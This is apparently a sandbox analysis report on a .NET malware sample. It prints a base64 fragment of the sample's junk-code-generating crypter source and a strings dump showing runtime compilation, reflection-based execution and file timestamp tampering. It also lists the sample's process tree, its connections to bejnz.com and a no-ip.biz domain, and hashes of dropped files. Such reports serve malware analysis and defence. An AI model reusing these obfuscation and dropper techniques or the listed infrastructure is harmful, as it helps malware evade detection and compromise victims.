BhcmFtZXRlcnMsIFNvdXJjZSkNCg0KCQkNCg0KICAgIEVuZCBTdWINCkVuZCBDbGFzcw0KDQpQdWJsaWMgQ2xhc3MgVU5sRFVjd2FhcA0KDQogICAgUHJpdmF0ZSBUaXAgQXMgSW50ZWdlcg0KICAgIFByaXZhdGUgS29saWtvIEFzIEludGVnZXINCg0KICAgIFN1YiBOZXcoQnlWYWwgVHlwZSBBcyBJbnRlZ2VyLCBCeVZhbCBLb2xpa294IEFzIEludGVnZXIpDQogICAgICAgIFRpcCA9IFR5cGUNCiAgICAgICAgS29saWtvID0gS29saWtveA0KICAgIEVuZCBTdWINCg0KICAgIFB1YmxpYyBGdW5jdGlvbiBnTUxNVEtKdXBkKCkgQXMgU3RyaW5nDQogICAgICAgIERpbSBob2xkZXIgQXMgU3RyaW5nID0gU3RyaW5nLkVtcHR5DQogICAgICAgIEZvciBpIEFzIEludGVnZXIgPSAwIFRvIEtvbGlrbw0KICAgICAgICAgICAgSWYgVGlwID0gMSBUaGVuDQogICAgICAgICAgICAgICAgaG9sZGVyID0gaG9sZGVyICYgeFlxZndGZ1NBcyhpKSAmIHZiTmV3TGluZQ0KICAgICAgICAgICAgRWxzZQ0KICAgICAgICAgICAgICAgIGhvbGRlciA9IGhvbGRlciAmIHRSTFN4cnltZWkoaSkgJiB2Yk5ld0xpbmUNCiAgICAgICAgICAgIEVuZCBJZg0KICAgICAgICBOZXh0DQogICAgICAgIFJldHVybiBob2xkZXINCiAgICBFbmQgRnVuY3Rpb24NCg0KICAgIFB1YmxpYyBGdW5jdGlvbiB0UkxTeHJ5bWVpKEJ5VmFsIG5hbWUgQXMgU3RyaW5nKSBBcyBTdHJpbmcNCiAgICAgICAgRGltIEZ1bmsgQXMgTmV3IFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXINCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICBQdWJsaWMgU3ViIHZhcjEiICYgbmFtZSAmICIoQnlWYWwgdmFyMiBBcyBTdHJpbmcsIEJ5VmFsIHZhcjMgQXMgU3RyaW5nLCBCeVZhbCB2YXI0IEFzIFN0cmluZykiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICBEaW0gdmFyNSBBcyBTdHJpbmcoKSA9IHsiInZhcjEiIiwgIiJ2YXIyIiIsICIidmFyMyIiLCAiInZhcjQiIiwgIiJ2YXI1IiJ9IikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgRm9yIEVhY2ggdmFyNiBBcyBTdHJpbmcgSW4gdmFyNSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICBEbyBVbnRpbCB2YXI1KDApID0gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgdmFyMyA9IHZhcjQgJiB2YXIyIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBJZiB2YXI0LkNvbnRhaW5zKHZhcjUoMikpID0gVHJ1ZSBUaGVuIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgdmFyNiA9IHZhcjQuTGVuZ3RoIC0gMSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgIFdoaWxlIHZhcjMuTGVuZ3RoID0gMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBEbyBXaGlsZSB2YXIyLkNvbnRhaW5zKHZhcjUoMSkpIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgICAgICAgICBFeGl0IFN1YiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBMb29wIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgRW5kIFdoaWxlIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBFbmQgSWYiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICAgICAgTG9vcCIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgIE5leHQiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgIEVuZCBTdWIiKQ0KICAgICAgICBEaW0gc3JjIEFzIFN0cmluZyA9IEZ1bmsuVG9TdHJpbmcNCiAgICAgICAgRGltIHZhcnMoKSBBcyBTdHJpbmcgPSB7InZhcjEiLCAidmFyMiIsICJ2YXIzIiwgInZhcjQiLCAidmFyNSIsICJ2YXI2In0NCiAgICAgICAgUmFuZG9taXplKCkNCiAgICAgICAgRm9yIGkgQXMgSW50ZWdlciA9IDAgVG8gdmFycy5MZW5ndGggLSAxDQogICAgICAgICAgICBzcmMgPSBzcmMuUmVwbGFjZSh2YXJzKGkpLCBBKDUpICYgbmFtZSkNCiAgICAgICAgTmV4dA0KICAgICAgICBSYW5kb21pemUoKQ0KICAgICAgICBSZXR1cm4gc3JjDQogICAgRW5kIEZ1bmN0aW9uDQoNCg0KICAgIFB1YmxpYyBGdW5jdGlvbiB4WXFmd0ZnU0FzKEJ5VmFsIG5hbWUgQXMgU3RyaW5nKSBBcyBTdHJpbmcNCiAgICAgICAgRGltIEZ1bmsgQXMgTmV3IFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXINCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICBQdWJsaWMgRnVuY3Rpb24gdmFyMSIgJiBuYW1lICYgIihCeVZhbCB2YXIyIEFzIFN0cmluZywgQnlWYWwgdmFyMyBBcyBTdHJpbmcsIEJ5VmFsIHZhcjQgQXMgU3RyaW5nKSBBcyBTdHJpbmciKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICBEaW0gdmFyNSBBcyBTdHJpbmcoKSA9IHsiInZhcjEiIiwgIiJ2YXIyIiIsICIidmFyMyIiLCAiInZhcjQiIiwgIiJ2YXI1IiJ9IikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgRm9yIEVhY2ggdmFyNiBBcyBTdHJpbmcgSW4gdmFyNSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICBEbyBVbnRpbCB2YXI1KDApID0gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgdmFyMyA9IHZhcjQgJiB2YXIyIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBJZiB2YXI0LkNvbnRhaW5zKHZhcjUoMikpID0gVHJ1ZSBUaGVuIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgdmFyNiA9IHZhcjQuTGVuZ3RoIC0gMSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgIFdoaWxlIHZhcjMuTGVuZ3RoID0gMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBEbyBXaGlsZSB2YXIyLkNvbnRhaW5zKHZhcjUoMSkpIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZXR1cm4gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXhpdCBGdW5jdGlvbiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBMb29wIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgRW5kIFdoaWxlIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBFbmQgSWYiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICAgICAgTG9vcCIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICBSZXR1cm4gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgIE5leHQiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgIEVuZCBGdW5jdGlvbiIpDQogICAgICAgIERpbSBzcmMgQXMgU3RyaW5nID0gRnVuay5Ub1N0cmluZw0KICAgICAgICBEaW0gdmFycygpIEFzIFN0cmluZyA9IHsidmFyMSIsICJ2YXIyIiwgInZhcjMiLCAidmFyNCIsICJ2YXI1IiwgInZhcjYifQ0KICAgICAgICBSYW5kb21pemUoKQ0KICAgICAgICBGb3IgaSBBcyBJbnRlZ2VyID0gMCBUbyB2YXJzLkxlbmd0aCAtIDENCiAgICAgICAgICAgIHNyYyA9IHNyYy5SZXBsYWNlKHZhcnMoaSksIEEoNSkgJiBuYW1lKQ0KICAgICAgICBOZXh0DQogICAgICAgIFJhbmRvbWl6ZSgpDQogICAgICAgIFJldHVybiBzcmMNCiAgICBFbmQgRnVuY3Rpb24NCg0KDQogICAgUHVibGljIEZ1bmN0aW9uIEEoQnlWYWwgbGVuZ2h0IEFzIEludGVnZXIpIEFzIFN0cmluZw0KICAgICAgICBSYW5kb21pemUoKSA6IERpbSBiKCkgQXMgQ2hhciA6IERpbSBzIEFzIE5ldyBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKCIiKSA6IGIgPSAiUVdFUlRZVUlPUEFTREZHSEpLTFpYQ1ZCTk1xd2VydHl1aW9wYXNkZmdoamtsenhjdmJubSIuVG9DaGFyQXJyYXkoKSA6IEZvciBpIEFzIEludGVnZXIgPSAxIFRvIGxlbmdodCA6IFJhbmRvbWl6ZSgpIDogRGltIHogQXMgSW50ZWdlciA9IEludCgoKGIuTGVuZ3RoIC0gMikgLSAwICsgMSkgKiBSbmQoKSkgKyAxIDogcy5BcHBlbmQoYih6KSkgOiBOZXh0IDogUmV0dXJuIHMuVG9TdHJpbmcNCiAgICBFbmQgRnVuY3Rpb24NCiAgICBQdWJsaWMgRnVuY3Rpb24gQUIoQnlWYWwgbGVuZ2h0IEFzIEludGVnZXIpIEFzIFN0cmluZw0KICAgICAgICBSYW5kb21pemUoKSA6IERpbSBiKCkgQXMgQ2hhciA6IERpbSBzIEFzIE5ldyBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKCIiKSA6IGIgPSAiMTIzNDU2Nzg5MCIuVG9DaGFyQXJyYXkoKSA6IEZvciBpIEFzIEludGVnZXIgPSAxIFRvIGxlbmdodCA6IFJhbmRvbWl6ZSgpIDogRGltIHogQXMgSW50ZWdlciA9IEludCgoKGIuTGVuZ3RoIC0gMikgLSAwICsgMSkgKiBSbmQoKSkgKyAxIDogcy5BcHBlbmQoYih6KSkgOiBOZXh0IDogUmV0dXJuIHMuVG9TdHJpbmcNCiAgICBFbmQgRnVuY3Rpb24NCg0KDQpFbmQgQ2xhc3MNCg0KDQo=
v2.0.50727
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
svmGascTmrlSynz
KDWCDRKeAPbpAiz
IhUzbVAOEXKgAph
oFVBCwSYDjRELVN
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
Microsoft.VisualBasic.Devices
Computer
System
Object
.cctor
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
Equals
GetHashCode
GetType
ToString
Create__Instance__
instance
Dispose__Instance__
get_GetInstance
m_ThreadStaticValue
GetInstance
GvApp00
SZuOe0
IyvBb0
PRCTw0
YmryD11
LszoG1
AAPFn1
YFrTR1
Deflate_D
System.IO
Stream
getStreamBytesX
dataStr
dataChunks
MHUXt00
FFmWw0
avMlB0
cGMGS0
KdgbC11
Ryceo1
EAntq1
qMtHO1
LpfjiUCGnupRuan
WauCh00
uBaxr0
rKRtW0
FwPqD0
OTJZi11
RYGNZ1
vDtnL1
DEijj1
lenght
ToBase
FromBase
evWPmyfgdkGCrUZ
Output
Source
Koliko
Kolikox
JjYboHKfHZolDwF
QwbvNYVPFfFNLso
TwmkfmHyQgbXHzc
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
System.Diagnostics
DebuggerHiddenAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
Activator
CreateInstance
MyGroupCollectionAttribute
System.Runtime.InteropServices
ComVisibleAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
String
Concat
Contains
get_Length
Conversions
Operators
CompareString
System.Resources
ResourceManager
Delete
ProjectData
Exception
SetProjectError
ClearProjectError
System.Reflection
Assembly
GetExecutingAssembly
GetObject
MethodInfo
get_EntryPoint
MethodBase
Invoke
MemoryStream
System.IO.Compression
DeflateStream
CompressionMode
CopyArray
STAThreadAttribute
DateTime
Random
ProcessStartInfo
ResourceWriter
Process
GetCurrentProcess
ProcessModule
get_MainModule
get_FileName
AddResource
Generate
IDisposable
Dispose
GetTempFileName
Replace
VBMath
Randomize
Strings
StrReverse
SetCreationTime
SetLastAccessTime
SetLastWriteTime
ProcessWindowStyle
set_WindowStyle
set_FileName
set_Arguments
System.Text
StringBuilder
ToCharArray
Conversion
Append
Encoding
get_Default
GetBytes
Convert
ToBase64String
FromBase64String
GetString
ICodeCompiler
CompilerResults
CompilerParameters
VBCodeProvider
CreateCompiler
set_GenerateExecutable
set_OutputAssembly
System.Collections.Specialized
StringCollection
get_ReferencedAssemblies
get_EmbeddedResources
set_CompilerOptions
CompileAssemblyFromSource
CreateProjectError
zCom.resources
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
tmp5EE1.tmp
tmp5EE1.tmp.exe
MyTemplate
8.0.0.0
My.Computer
My.User
My.Application
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
G�v�A�p�p�0�
S�Z�u�O�e�0�
I�y�v�B�b�0�
P�R�C�T�w�0�
S�C�w�B�p�0�
Y�m�r�y�D�1�
L�s�z�o�G�1�
A�A�P�F�n�1�
Y�F�r�T�R�1�
Z�P�D�T�e�1�
M�H�U�X�t�0�
F�F�m�W�w�0�
a�v�M�l�B�0�
c�G�M�G�S�0�
Y�B�X�k�w�0�
K�d�g�b�C�1�
R�y�c�e�o�1�
E�A�n�t�q�1�
q�M�t�H�O�1�
H�z�X�U�V�1�
z�C�o�m�.�r�e�s�o�u�r�c�e�s�
K�D�W�C�D�R�K�e�A�P�b�p�A�i�z�
I�h�U�z�b�V�A�O�E�X�K�g�A�p�h�
s�v�m�G�a�s�c�T�m�r�l�S�y�n�z�
o�F�V�B�C�w�S�Y�D�j�R�E�L�V�N�
J�j�Y�b�o�H�K�f�H�Z�o�l�D�w�F�
Q�w�b�v�N�Y�V�P�F�f�F�N�L�s�o�
T�w�m�k�f�m�H�y�Q�g�b�X�H�z�c�
e�v�W�P�m�y�f�g�d�k�G�C�r�U�Z�
L�p�f�j�i�U�C�G�n�u�p�R�u�a�n�
W�a�u�C�h�0�
u�B�a�x�r�0�
r�K�R�t�W�0�
F�w�P�q�D�0�
J�j�t�w�C�0�
O�T�J�Z�i�1�
R�Y�G�N�Z�1�
v�D�t�n�L�1�
D�E�i�j�j�1�
h�x�y�N�y�1�
q�w�e�r�t�y�u�i�o�p�a�s�d�f�g�h�j�k�l�z�x�c�v�b�n�m�Q�W�E�R�T�Y�U�I�O�P�A�S�D�F�G�H�J�K�L�Z�X�C�V�B�N�M�
1�2�3�4�5�6�7�8�9�0�
S�y�s�t�e�m�.�d�l�l�
S�y�s�t�e�m�.�D�a�t�a�.�d�l�l�
/�f�i�l�e�a�l�i�g�n�:�0�x�0�0�0�0�0�2�0�0� �/�o�p�t�i�m�i�z�e�+� �/�p�l�a�t�f�o�r�m�:�X�8�6� �/�d�e�b�u�g�-� �/�t�a�r�g�e�t�:�w�i�n�e�x�e�
� � � �P�u�b�l�i�c� �S�u�b� �v�a�r�1�
(�B�y�V�a�l� �v�a�r�2� �A�s� �S�t�r�i�n�g�,� �B�y�V�a�l� �v�a�r�3� �A�s� �S�t�r�i�n�g�,� �B�y�V�a�l� �v�a�r�4� �A�s� �S�t�r�i�n�g�)�
� � � � � � � �D�i�m� �v�a�r�5� �A�s� �S�t�r�i�n�g�(�)� �=� �{�"�v�a�r�1�"�,� �"�v�a�r�2�"�,� �"�v�a�r�3�"�,� �"�v�a�r�4�"�,� �"�v�a�r�5�"�}�
� � � � � � � �F�o�r� �E�a�c�h� �v�a�r�6� �A�s� �S�t�r�i�n�g� �I�n� �v�a�r�5�
� � � � � � � � � � � �D�o� �U�n�t�i�l� �v�a�r�5�(�0�)� �=� �v�a�r�2�
� � � � � � � � � � � � � � � �v�a�r�3� �=� �v�a�r�4� �&� �v�a�r�2�
� � � � � � � � � � � � � � � �I�f� �v�a�r�4�.�C�o�n�t�a�i�n�s�(�v�a�r�5�(�2�)�)� �=� �T�r�u�e� �T�h�e�n�
� � � � � � � � � � � � � � � � � � � �v�a�r�6� �=� �v�a�r�4�.�L�e�n�g�t�h� �-� �1�
� � � � � � � � � � � � � � � � � � � �W�h�i�l�e� �v�a�r�3�.�L�e�n�g�t�h� �=� �2�
� � � � � � � � � � � � � � � � � � � � � � � �D�o� �W�h�i�l�e� �v�a�r�2�.�C�o�n�t�a�i�n�s�(�v�a�r�5�(�1�)�)�
� � � � � � � � � � � � � � � � � � � � � � � � � � � �E�x�i�t� �S�u�b�
� � � � � � � � � � � � � � � � � � � � � � � �L�o�o�p�
� � � � � � � � � � � � � � � � � � � �E�n�d� �W�h�i�l�e�
� � � � � � � � � � � � � � � �E�n�d� �I�f�
� � � � � � � � � � � �L�o�o�p�
� � � � � � � �N�e�x�t�
� � � �E�n�d� �S�u�b�
� � � �P�u�b�l�i�c� �F�u�n�c�t�i�o�n� �v�a�r�1�
(�B�y�V�a�l� �v�a�r�2� �A�s� �S�t�r�i�n�g�,� �B�y�V�a�l� �v�a�r�3� �A�s� �S�t�r�i�n�g�,� �B�y�V�a�l� �v�a�r�4� �A�s� �S�t�r�i�n�g�)� �A�s� �S�t�r�i�n�g�
� � � � � � � � � � � � � � � � � � � � � � � � � � � �R�e�t�u�r�n� �v�a�r�2�
� � � � � � � � � � � � � � � � � � � � � � � � � � � �E�x�i�t� �F�u�n�c�t�i�o�n�
� � � � � � � � � � � �R�e�t�u�r�n� �v�a�r�2�
� � � �E�n�d� �F�u�n�c�t�i�o�n�
Q�W�E�R�T�Y�U�I�O�P�A�S�D�F�G�H�J�K�L�Z�X�C�V�B�N�M�q�w�e�r�t�y�u�i�o�p�a�s�d�f�g�h�j�k�l�z�x�c�v�b�n�m�
V�S�_�V�E�R�S�I�O�N�_�I�N�F�O�
V�a�r�F�i�l�e�I�n�f�o�
T�r�a�n�s�l�a�t�i�o�n�
S�t�r�i�n�g�F�i�l�e�I�n�f�o�
0�0�0�0�0�4�b�0�
F�i�l�e�D�e�s�c�r�i�p�t�i�o�n�
F�i�l�e�V�e�r�s�i�o�n�
0�.�0�.�0�.�0�
I�n�t�e�r�n�a�l�N�a�m�e�
t�m�p�5�E�E�1�.�t�m�p�.�e�x�e�
L�e�g�a�l�C�o�p�y�r�i�g�h�t�
O�r�i�g�i�n�a�l�F�i�l�e�n�a�m�e�
t�m�p�5�E�E�1�.�t�m�p�.�e�x�e�
P�r�o�d�u�c�t�V�e�r�s�i�o�n�
0�.�0�.�0�.�0�
A�s�s�e�m�b�l�y� �V�e�r�s�i�o�n�
0�.�0�.�0�.�0�
Process Tree
-
0c423a9cf40f937c652b4d421b5cd7ac0c8762dcf576446eea5a1f1c7c02ee0a.exe (1064)
"C:\Users\Administrator\AppData\Local\Temp\0c423a9cf40f937c652b4d421b5cd7ac0c8762dcf576446eea5a1f1c7c02ee0a.exe"
- tmpBAA5.tmp.exe (2492) "C:\Users\Administrator\AppData\Local\Temp\tmpBAA5.tmp.exe" C:\Users\Administrator\AppData\Local\Temp\0c423a9cf40f937c652b4d421b5cd7ac0c8762dcf576446eea5a1f1c7c02ee0a.exe
-
vbc.exe (2160)
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Administrator\AppData\Local\Temp\dmdlwkyy.cmdline"
- cvtres.exe (1156) C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESBDF2.tmp" "C:\Users\ADMINI~1\AppData\Local\Temp\vbcBDF1.tmp"
0c423a9cf40f937c652b4d421b5cd7ac0c8762dcf576446eea5a1f1c7c02ee0a.exe, PID: 1064, Parent PID: 2284
default registry file network process services synchronisation iexplore office pdf
vbc.exe, PID: 2160, Parent PID: 1064
default registry file network process services synchronisation iexplore office pdf
Hosts
| IP |
|---|
| 114.114.114.114 |
| 8.8.8.8 |
| 44.221.84.105 |
DNS
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| dns.msftncsi.com | A 131.107.255.255 | 131.107.255.255 |
| dns.msftncsi.com | 131.107.255.255 | |
| bejnz.com | A 44.221.84.105 | 44.221.84.105 |
| hackorchronix.no-ip.biz |
TCP
| Source | Source Port | Destination | Destination Port |
|---|---|---|---|
| 192.168.56.101 | 49174 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49175 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49176 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49177 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49178 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49179 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49180 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49181 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49182 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49184 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49185 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49186 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49187 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49188 | 44.221.84.105 bejnz.com | 80 |
| 192.168.56.101 | 49191 | 44.221.84.105 bejnz.com | 80 |
UDP
| Source | Source Port | Destination | Destination Port |
|---|---|---|---|
| 192.168.56.101 | 53179 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 49642 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 137 | 192.168.56.255 | 137 |
| 192.168.56.101 | 61714 | 114.114.114.114 | 53 |
| 192.168.56.101 | 61714 | 8.8.8.8 | 53 |
| 192.168.56.101 | 56933 | 8.8.8.8 | 53 |
| 192.168.56.101 | 138 | 192.168.56.255 | 138 |
| 192.168.56.101 | 58485 | 114.114.114.114 | 53 |
| 192.168.56.101 | 51758 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 58485 | 8.8.8.8 | 53 |
| 192.168.56.101 | 52215 | 114.114.114.114 | 53 |
| 192.168.56.101 | 62361 | 114.114.114.114 | 53 |
| 192.168.56.101 | 62361 | 8.8.8.8 | 53 |
| 192.168.56.101 | 58985 | 114.114.114.114 | 53 |
| 192.168.56.101 | 58985 | 8.8.8.8 | 53 |
HTTP & HTTPS Requests
No HTTP requests performed.
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts
| Name | 2eeeb3df9f3d313d_tmpbaa5.tmp.exe |
|---|---|
| Filepath | C:\Users\Administrator\AppData\Local\Temp\tmpBAA5.tmp.exe |
| Size | 78.5KB |
| Processes | 2160 (vbc.exe) |
| Type | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
| MD5 | caa9d25ee56a96e2612f872804ffd96f |
| SHA1 | f65243c11f9e915df178748ea837dcf2b83ca040 |
| SHA256 | 2eeeb3df9f3d313d9b9ddbaec15cfed24bedde618b953e783f0b443ff751ab0e |
| CRC32 | AC3A0257 |
| ssdeep | None |
| Yara | None matched |
| VirusTotal | Search for analysis |
| Name | 901c9e4328fc0499_dmdlwkyy.out |
|---|---|
| Filepath | C:\Users\Administrator\AppData\Local\Temp\dmdlwkyy.out |
| Size | 2.5KB |
| Processes | 1064 (0c423a9cf40f937c652b4d421b5cd7ac0c8762dcf576446eea5a1f1c7c02ee0a.exe) 2160 (vbc.exe) |
| Type | Unicode text, UTF-8 (with BOM) text, with very long lines (378), with CRLF line terminators |
| MD5 | bb21858ab5ac86c9a06f4a6cf246c6b3 |
| SHA1 | 9d014583f5876413877958e77f9869ef61af3931 |
| SHA256 | 901c9e4328fc0499166e05740d570dbdef306370a297caa5a8824ad76b32f240 |
| CRC32 | B5284616 |
| ssdeep | None |
| Yara | None matched |
| VirusTotal | Search for analysis |
| Name | 248ae4dd2a3ee22e_vbcBDF1.tmp |
|---|---|
| Filepath | C:\Users\Administrator\AppData\Local\Temp\vbcBDF1.tmp |
| Size | 660.0B |
| Processes | 2160 (vbc.exe) |
| Type | MSVC .res |
| MD5 | 60db74b17b303e3a28f09ebb4afd4bfa |
| SHA1 | d4d3e423129710d5d122bfe9414a95603dcdb4c0 |
| SHA256 | 248ae4dd2a3ee22e8bdd697ebe2bf31033b425cc325ae11e3008df3029b3d959 |
| CRC32 | DF8F64B0 |
| ssdeep | None |
| Yara | None matched |
| VirusTotal | Search for analysis |
| Name | a2c2bdc04a0c3b63_dmdlwkyy.cmdline |
|---|---|
| Filepath | C:\Users\Administrator\AppData\Local\Temp\dmdlwkyy.cmdline |
| Size | 282.0B |
| Processes | 1064 (0c423a9cf40f937c652b4d421b5cd7ac0c8762dcf576446eea5a1f1c7c02ee0a.exe) |
| Type | Unicode text, UTF-8 (with BOM) text, with no line terminators |
| MD5 | c7b7c50c6e52f555ad777e7cf3442b2f |
| SHA1 | aac78436a864c2ec12ef7c6b04652920c3ea083c |
| SHA256 | a2c2bdc04a0c3b630fb935fbebb28ea626713820b6e382877ba3f18667af0dd5 |
| CRC32 | 89CD1BE5 |
| ssdeep | None |
| Yara | None matched |
| VirusTotal | Search for analysis |
| Name | d7dbe167a7b64a4d_zCom.resources |
|---|---|
| Filepath | C:\Users\Administrator\AppData\Local\Temp\zCom.resources |
| Size | 62.7KB |
| Processes | 1064 (0c423a9cf40f937c652b4d421b5cd7ac0c8762dcf576446eea5a1f1c7c02ee0a.exe) |
| Type | data |
| MD5 | aa4bdac8c4e0538ec2bb4b7574c94192 |
| SHA1 | ef76d834232b67b27ebd75708922adea97aeacce |
| SHA256 | d7dbe167a7b64a4d11e76d172c8c880020fe7e4bc9cae977ac06982584a6b430 |
| CRC32 | 9BF4E1EA |
| ssdeep | None |
| Yara | None matched |
| VirusTotal | Search for analysis |
| Name | f645818de027af27_RESBDF2.tmp |
|---|---|
| Filepath | C:\Users\Administrator\AppData\Local\Temp\RESBDF2.tmp |
| Size | 1.2KB |
| Processes | 1156 (cvtres.exe) 2160 (vbc.exe) |
| Type | Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x416, 9 symbols, created Sat Sep 28 10:42:16 2024, 1st section name ".debug$S" |
| MD5 | ddee4c119db654b7d21b93839c357b12 |
| SHA1 | fe23032178e739b75502c6e2e242220654678ef4 |
| SHA256 | f645818de027af273680ebc06142400d03f23fd22a260da44af491ee0dc21e6e |
| CRC32 | DA5259AE |
| ssdeep | None |
| Yara | None matched |
| VirusTotal | Search for analysis |
| Name | e3b0c44298fc1c14_tmpBAA5.tmp.exe |
|---|---|
| Size | 0.0B |
| Type | empty |
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| CRC32 | 00000000 |
| ssdeep | None |
| Yara | None matched |
| VirusTotal | Search for analysis |
| Name | 0e29b2f96b873595_dmdlwkyy.0.vb |
|---|---|
| Filepath | C:\Users\Administrator\AppData\Local\Temp\dmdlwkyy.0.vb |
| Size | 14.9KB |
| Processes | 1064 (0c423a9cf40f937c652b4d421b5cd7ac0c8762dcf576446eea5a1f1c7c02ee0a.exe) |
| Type | Unicode text, UTF-8 (with BOM) text, with very long lines (311), with CRLF line terminators |
| MD5 | bd79b8ea75e8aa981617a6de2484a2c4 |
